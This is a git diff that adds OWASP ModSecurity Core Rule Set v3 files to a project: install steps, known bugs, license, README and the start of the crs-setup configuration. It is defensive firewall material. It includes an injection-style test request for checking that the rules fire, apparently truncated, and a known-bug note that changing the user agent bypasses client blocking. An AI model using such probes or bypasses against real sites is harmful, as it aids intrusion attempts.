owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf + include owasp-modsecurity-crs/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf + include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf + include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf + include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf + include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf + include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf + include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf + ``` + 8. Restart web server and ensure it starts without errors + 9. Make sure your web sites are still running fine. + 10. Proceed to the section "Testing the Installation" below. + +Installing on IIS +----------------- + The IIS installer comes with an optional version of CRS built in. + To upgrade or install this after the fact follow the following + steps. + 1. Navigate to "[drive_letters]:\Program Files\ModSecurity IIS\" + 2. Download our release from https://coreruleset.org/installation/ + and unpack it into the current folder. + 3. Move the crs-setup.conf.example file to crs-setup.conf. + Please take this time to go through this + file and customize the settings for your local environment. Failure to + do so may result in false negatives and false positives. See the + section entitled OWASP CRS Configuration for more detail. + 4. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and + rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the + '.example' extension. This will allow you to add exceptions without updates + overwriting them in the future. + 5. 
Navigate back to the 'ModSecurity IIS' folder and modify the + 'modsecurity_iis' to include the following: + ``` + include owasp-modsecurity-crs/crs-setup.conf + include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf + include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf + include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf + include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf + include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf + include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf + include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf + include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf + include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf + include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf + include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf + include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf + include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf + include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf + include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf + include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf + include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf + include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf + include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf + include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf + include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf + include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf + include 
owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf + ``` + 6. Restart web server and ensure it starts without errors + 7. Make sure your web sites are still running fine. + 8. Proceed to the section "Testing the Installation" below. + +Testing the Installation +======================== + To test your installation you should be able to use any number + of attacks. A typical request which should trigger CRS would be + ```http://localhost/?param=">``` + Upon sending this request you should see events reported in the + error log (nginx apache) or the event viewer (IIS). + + If have not changed the defaults with regards to anomaly scoring, + blocking and sampling percentage, then this request should have + been blocked and access forbidden. Likewise if you have configured + ModSecurity debug logging and/or audit logging this event should + log to these locations as well. + +OWASP CRS Configuration +======================= + The crs-setup.conf file includes management rules + and directives that can control important CRS functions. + The crs-setup.conf file comes with extensive comments. + This section here brings only the essential parts. + + By default we do not include settings within the crs-setup.conf + that configure ModSecurity itself. Instead those configuration + settings are set during the installation of ModSecurity proper. + An example for such such a + configuration file is available via the ModSecurity project + (https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended). + Be aware the crs-setup.conf file DOES specify + configuration directives such as SecDefaultAction. The default + is the anomaly scoring mode with the appropriate + SecDefaultAction as defined in the crs-setup.conf. + Alternative configuration modes are supported and explained + in crs-setup.conf. + + The default anomaly/correlation mode establishes an incoming + anomaly score threshold of 5 and an outgoing anomaly score + threshold of 4. 
The default installation has been tuned to + reduce false positives in a way that will allow most requests + to pass in this default setup. + + However, testing the setup and tuning false positives + before going to production is vital. This is especially true + if you raise the paranoia level with is set to 1 by default. + Higher paranoia levels ranging from 2 to 4 include more + aggressive rules which will raise additional false positives + but also raise the security level of your service. + + If you are unsure about the performance impact of the CRS + or if you are unsure about the number of false positives, then + you may want to use the sampling percentage. This number, + which is set to 100 by default, controls the percentage + of requests which is funneled into the CRS. Fresh installs + on high traffic sites are advised to start with a low, or + very low number of percentages and raise the number + slowly up to 100. Be aware that any number below 100 allows + a random number of requests to bypass the ruleset completely. + + Update the TX policy settings for allowed Request Methods, File + Extensions, maximum numbers of arguments, etc to better reflect + your environment that is being protected. + + Make sure your GeoIP and Project Honeypot settings are specified + if you are using them. + The GeoIP database is no longer included with the CRS. Instead + you are advised to download it regularly. + + The use of Project Honeypot requires a + free API key. These require an account but can be obtained at + https://www.projecthoneypot.org/httpbl_configure.php. + + Be sure to check out the other settings present within the + crs-setup.conf file. There are many other options that have to + do with aspects of web application security that are beyond + this document but are well explained in crs-setup.conf. 
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/KNOWN_BUGS b/src/common/core/modsecurity/files/coreruleset-v3/KNOWN_BUGS
new file mode 100644
index 000000000..d8083dcc2
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/KNOWN_BUGS
@@ -0,0 +1,50 @@
+== OWASP ModSecurity Core Rule Set (CRS) KNOWN BUGS ==
+
+== Report Bugs/Issues to GitHub Issues Tracker or the mailinglist ==
+* https://github.com/SpiderLabs/owasp-modsecurity-crs/issues
+or the CRS Google Group at
+* https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project
+
+* There are still false positives for standard web applications in
+ the default install (paranoia level 1). Please report these when
+ you encounter them.
+ False Positives from paranoia level 2 rules are less interesting,
+ as we expect users to write exclusion rules for their alerts in
+ the higher paranoia levels.
+* Permanent blocking of clients is based on a previous user agent / IP
+ combination. Changing the user agent will thus allow to bypass
+ this new filter. The plan is to allow for a purely IP based
+ filter in the future.
+* Apache 2.4 prior to 2.4.11 is affected by a bug in parsing multi-line
+ configuration directives, which causes Apache to fail during startup
+ with an error such as:
+ Error parsing actions: Unknown action: \\
+ Action 'configtest' failed.
+ This bug is known to plague RHEL/Centos 7 below v7.4 or
+ httpd v2.4.6 release 67 and Ubuntu 14.04 LTS users.
+ https://bz.apache.org/bugzilla/show_bug.cgi?id=55910
+ We advise to upgrade your Apache version. If upgrading is not possible,
+ we have provided a script in the util/join-multiline-rules directory
+ which converts the rules into a format that works around the bug.
+ You have to re-run this script whenever you modify or update
+ the CRS rules.
+* Debian up to and including Jessie lacks YAJL/JSON support in ModSecurity,
+ which causes the following error in the Apache ErrorLog or SecAuditLog:
+ 'ModSecurity: JSON support was not enabled.'
+ JSON support was enabled in Debian's package version 2.8.0-4 (Nov 2014).
+ You can either use backports.debian.org to install the latest ModSecurity
+ release or disable rule id 200001.
+* As of CRS version 3.0.1, support has been added for the application/soap+xml MIME
+ type by default, as specified in RFC 3902. OF IMPORTANCE, application/soap+xml is
+ indicative that XML will be provided. In accordance with this, ModSecurity's XML
+ Request Body Processor should also be configured to support this MIME type. Within
+ the ModSecurity project, commit 5e4e2af
+ (https://github.com/SpiderLabs/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e)
+ has been merged to support this endeavour. However, if you are running a modified or
+ preexisting version of the modsecurity.conf provided by this repository, you may
+ wish to upgrade rule '200000' accordingly. The rule now appears as follows:
+
+```
+SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \
+ "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML"
+```
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/LICENSE b/src/common/core/modsecurity/files/coreruleset-v3/LICENSE
new file mode 100644
index 000000000..b671fe62a
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/LICENSE
@@ -0,0 +1,201 @@
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright 2006 the OWASP Core Rule Set contributors
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/README.md b/src/common/core/modsecurity/files/coreruleset-v3/README.md
new file mode 100644
index 000000000..aa640560c
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/README.md
@@ -0,0 +1,34 @@
+![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev)
+![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev)
+![GHA build v3.1/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.1%2Fdev)
+[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/)
+[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390)
+[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
+
+
+
+# OWASP ModSecurity Core Rule Set (CRS)
+
+The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts.
+
+## CRS Resources
+
+Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS.
+
+## Contributing to the CRS
+
+We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections.
+
+[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log.
+
+[Sign up for our Google Group](https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list.
+
+[Join the #coreruleset channel on OWASP Slack](http://owaspslack.com) to chat about the CRS.
+
+## License
+
+Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+
+Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+
+The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details.
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/SECURITY.md b/src/common/core/modsecurity/files/coreruleset-v3/SECURITY.md
new file mode 100644
index 000000000..f8921987b
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/SECURITY.md
@@ -0,0 +1,4 @@
+# Security Policy
+
+See policy here: https://github.com/coreruleset/coreruleset/blob/v4.0/dev/SECURITY.md
+
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/SPONSORS.md b/src/common/core/modsecurity/files/coreruleset-v3/SPONSORS.md
new file mode 100644
index 000000000..5cf8ab3b8
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/SPONSORS.md
@@ -0,0 +1,13 @@
+## GOLD SPONSORS
+
+* Edgio
+* Google
+* Microsoft
+* Nginx (Part of F5)
+* United Security Providers
+* VMWare
+
+## SILVER SPONSORS
+
+* Bug Bounty Switzerland
+
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/crs-setup.conf.example b/src/common/core/modsecurity/files/coreruleset-v3/crs-setup.conf.example
new file mode 100644
index 000000000..e0b1d9cde
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/crs-setup.conf.example
@@ -0,0 +1,869 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + + +# +# -- [[ Introduction ]] -------------------------------------------------------- +# +# The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack +# detection rules that provide a base level of protection for any web +# application. They are written for the open source, cross-platform +# ModSecurity Web Application Firewall. +# +# See also: +# https://coreruleset.org/ +# https://github.com/SpiderLabs/owasp-modsecurity-crs +# https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project +# + + +# +# -- [[ System Requirements ]] ------------------------------------------------- +# +# CRS requires ModSecurity version 2.8.0 or above. +# We recommend to always use the newest ModSecurity version. +# +# The configuration directives/settings in this file are used to control +# the OWASP ModSecurity CRS. These settings do **NOT** configure the main +# ModSecurity settings (modsecurity.conf) such as SecRuleEngine, +# SecRequestBodyAccess, SecAuditEngine, SecDebugLog, and XML processing. +# +# The CRS assumes that modsecurity.conf has been loaded. It is bundled with +# ModSecurity. If you don't have it, you can get it from: +# 2.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v2/master/modsecurity.conf-recommended +# 3.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended +# +# The order of file inclusion in your webserver configuration should always be: +# 1. 
modsecurity.conf +# 2. crs-setup.conf (this file) +# 3. rules/*.conf (the CRS rule files) +# +# Please refer to the INSTALL file for detailed installation instructions. +# + + +# +# -- [[ Mode of Operation: Anomaly Scoring vs. Self-Contained ]] --------------- +# +# The CRS can run in two modes: +# +# -- [[ Anomaly Scoring Mode (default) ]] -- +# In CRS3, anomaly mode is the default and recommended mode, since it gives the +# most accurate log information and offers the most flexibility in setting your +# blocking policies. It is also called "collaborative detection mode". +# In this mode, each matching rule increases an 'anomaly score'. +# At the conclusion of the inbound rules, and again at the conclusion of the +# outbound rules, the anomaly score is checked, and the blocking evaluation +# rules apply a disruptive action, by default returning an error 403. +# +# -- [[ Self-Contained Mode ]] -- +# In this mode, rules apply an action instantly. This was the CRS2 default. +# It can lower resource usage, at the cost of less flexibility in blocking policy +# and less informative audit logs (only the first detected threat is logged). +# Rules inherit the disruptive action that you specify (i.e. deny, drop, etc). +# The first rule that matches will execute this action. In most cases this will +# cause evaluation to stop after the first rule has matched, similar to how many +# IDSs function. +# +# -- [[ Alert Logging Control ]] -- +# In the mode configuration, you must also adjust the desired logging options. +# There are three common options for dealing with logging. By default CRS enables +# logging to the webserver error log (or Event viewer) plus detailed logging to +# the ModSecurity audit log (configured under SecAuditLog in modsecurity.conf). 
+# +# - To log to both error log and ModSecurity audit log file, use: "log,auditlog" +# - To log *only* to the ModSecurity audit log file, use: "nolog,auditlog" +# - To log *only* to the error log file, use: "log,noauditlog" +# +# Examples for the various modes follow. +# You must leave one of the following options enabled. +# Note that you must specify the same line for phase:1 and phase:2. +# + +# Default: Anomaly Scoring mode, log to error log, log to ModSecurity audit log +# - By default, offending requests are blocked with an error 403 response. +# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example +# and review section 'Changing the Disruptive Action for Anomaly Mode'. +# - In Apache, you can use ErrorDocument to show a friendly error page or +# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html +# +SecDefaultAction "phase:1,log,auditlog,pass" +SecDefaultAction "phase:2,log,auditlog,pass" + +# Example: Anomaly Scoring mode, log only to ModSecurity audit log +# - By default, offending requests are blocked with an error 403 response. +# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example +# and review section 'Changing the Disruptive Action for Anomaly Mode'. +# - In Apache, you can use ErrorDocument to show a friendly error page or +# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html +# +# SecDefaultAction "phase:1,nolog,auditlog,pass" +# SecDefaultAction "phase:2,nolog,auditlog,pass" + +# Example: Self-contained mode, return error 403 on blocking +# - In this configuration the default disruptive action becomes 'deny'. After a +# rule triggers, it will stop processing the request and return an error 403. +# - You can also use a different error status, such as 404, 406, et cetera. 
+# - In Apache, you can use ErrorDocument to show a friendly error page or +# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html +# +# SecDefaultAction "phase:1,log,auditlog,deny,status:403" +# SecDefaultAction "phase:2,log,auditlog,deny,status:403" + +# Example: Self-contained mode, redirect back to homepage on blocking +# - In this configuration the 'tag' action includes the Host header data in the +# log. This helps to identify which virtual host triggered the rule (if any). +# - Note that this might cause redirect loops in some situations; for example +# if a Cookie or User-Agent header is blocked, it will also be blocked when +# the client subsequently tries to access the homepage. You can also redirect +# to another custom URL. +# SecDefaultAction "phase:1,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" +# SecDefaultAction "phase:2,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" + + +# +# -- [[ Paranoia Level Initialization ]] --------------------------------------- +# +# The Paranoia Level (PL) setting allows you to choose the desired level +# of rule checks that will add to your anomaly scores. +# +# With each paranoia level increase, the CRS enables additional rules +# giving you a higher level of security. However, higher paranoia levels +# also increase the possibility of blocking some legitimate traffic due to +# false alarms (also named false positives or FPs). If you use higher +# paranoia levels, it is likely that you will need to add some exclusion +# rules for certain requests and applications receiving complex input. +# +# - A paranoia level of 1 is default. In this level, most core rules +# are enabled. PL1 is advised for beginners, installations +# covering many different sites and applications, and for setups +# with standard security requirements. +# At PL1 you should face FPs rarely. 
If you encounter FPs, please +# open an issue on the CRS GitHub site and don't forget to attach your +# complete Audit Log record for the request with the issue. +# - Paranoia level 2 includes many extra rules, for instance enabling +# many regexp-based SQL and XSS injection protections, and adding +# extra keywords checked for code injections. PL2 is advised +# for moderate to experienced users desiring more complete coverage +# and for installations with elevated security requirements. +# PL2 comes with some FPs which you need to handle. +# - Paranoia level 3 enables more rules and keyword lists, and tweaks +# limits on special characters used. PL3 is aimed at users experienced +# at the handling of FPs and at installations with a high security +# requirement. +# - Paranoia level 4 further restricts special characters. +# The highest level is advised for experienced users protecting +# installations with very high security requirements. Running PL4 will +# likely produce a very high number of FPs which have to be +# treated before the site can go productive. +# +# All rules will log their PL to the audit log; +# example: [tag "paranoia-level/2"]. This allows you to deduct from the +# audit log how the WAF behavior is affected by paranoia level. +# +# It is important to also look into the variable +# tx.enforce_bodyproc_urlencoded (Enforce Body Processor URLENCODED) +# defined below. Enabling it closes a possible bypass of CRS. +# +# Uncomment this rule to change the default: +# +#SecAction \ +# "id:900000,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.paranoia_level=1" + + +# It is possible to execute rules from a higher paranoia level but not include +# them in the anomaly scoring. This allows you to take a well-tuned system on +# paranoia level 1 and add rules from paranoia level 2 without having to fear +# the new rules would lead to false positives that raise your score above the +# threshold. 
+# This optional feature is enabled by uncommenting the following rule and +# setting the tx.executing_paranoia_level. +# Technically, rules up to the level defined in tx.executing_paranoia_level +# will be executed, but only the rules up to tx.paranoia_level affect the +# anomaly scores. +# By default, tx.executing_paranoia_level is set to tx.paranoia_level. +# tx.executing_paranoia_level must not be lower than tx.paranoia_level. +# +# Please notice that setting tx.executing_paranoia_level to a higher paranoia +# level results in a performance impact that is equally high as setting +# tx.paranoia_level to said level. +# +#SecAction \ +# "id:900001,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.executing_paranoia_level=1" + + +# +# -- [[ Enforce Body Processor URLENCODED ]] ----------------------------------- +# +# ModSecurity selects the body processor based on the Content-Type request +# header. But clients are not always setting the Content-Type header for their +# request body payloads. This will leave ModSecurity with limited vision into +# the payload. The variable tx.enforce_bodyproc_urlencoded lets you force the +# URLENCODED body processor in these situations. This is off by default, as it +# implies a change of the behaviour of ModSecurity beyond CRS (the body +# processor applies to all rules, not only CRS) and because it may lead to +# false positives already on paranoia level 1. However, enabling this variable +# closes a possible bypass of CRS so it should be considered. +# +# Uncomment this rule to change the default: +# +#SecAction \ +# "id:900010,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.enforce_bodyproc_urlencoded=1" + + +# +# -- [[ Anomaly Mode Severity Levels ]] ---------------------------------------- +# +# Each rule in the CRS has an associated severity level. +# These are the default scoring points for each severity level. +# These settings will be used to increment the anomaly score if a rule matches. 
